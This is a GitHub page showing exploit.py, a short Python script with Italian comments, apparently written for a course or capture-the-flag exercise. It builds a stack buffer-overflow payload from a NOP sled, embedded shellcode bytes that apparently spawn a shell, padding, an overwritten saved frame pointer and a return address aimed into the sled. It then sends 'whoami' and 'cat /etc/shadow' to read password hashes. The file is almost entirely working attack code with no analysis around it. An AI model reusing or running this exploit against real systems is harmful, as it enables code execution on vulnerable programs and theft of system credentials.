-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
35 lines (25 loc) · 1.26 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from sys import stdout
from sys import argv
def hex2bytes_le(hexv: int) -> bytes:
'''
Funzione di comodo che converte un int
in bytes little-endian
'''
return bytes(reversed(bytes.fromhex(hex(hexv)[2:])))
def exploit(bufaddr: int, ebp: int, saved_fp: int, bufsize: int) -> list[int]:
nop = b'\x90'
shellcode = b'\x31\xc0\x50\xb8\x6e\x2f\x73\x68\x50\xb8\x2f\x2f\x62\x69\x50\xb8\xf9\x86\x4c\x42\x2d\xef\x86\x4c\x42\x83\xc0\x01\x89\xe3\x31\xc9\x31\xd2\x0f\x05'
sledlen = bufsize - len(shellcode) # Lunghezza NOP sled
dist = ebp - bufaddr # Distanza tra inizio buffer e frame pointer
pad = dist - 64 # Byte di padding prima di raggiungere l'old frame pointer
# bufaddr termina con un byte nullo, ma posso tranquillamente passare
# come return address bufaddr+1, cioè name[1], che è la seconda istruzione della nop sled
return nop*sledlen + shellcode + b'\x20'*pad + hex2bytes_le(saved_fp) + hex2bytes_le(bufaddr+1) + b'\x0a'
def main():
if len(argv) < 4:
exit(1)
stdout.buffer.write(exploit(int(argv[1], base=16), int(argv[2], base=16), int(argv[3], base=16), 64))
print('whoami')
print('cat /etc/shadow')
if __name__ == '__main__':
main()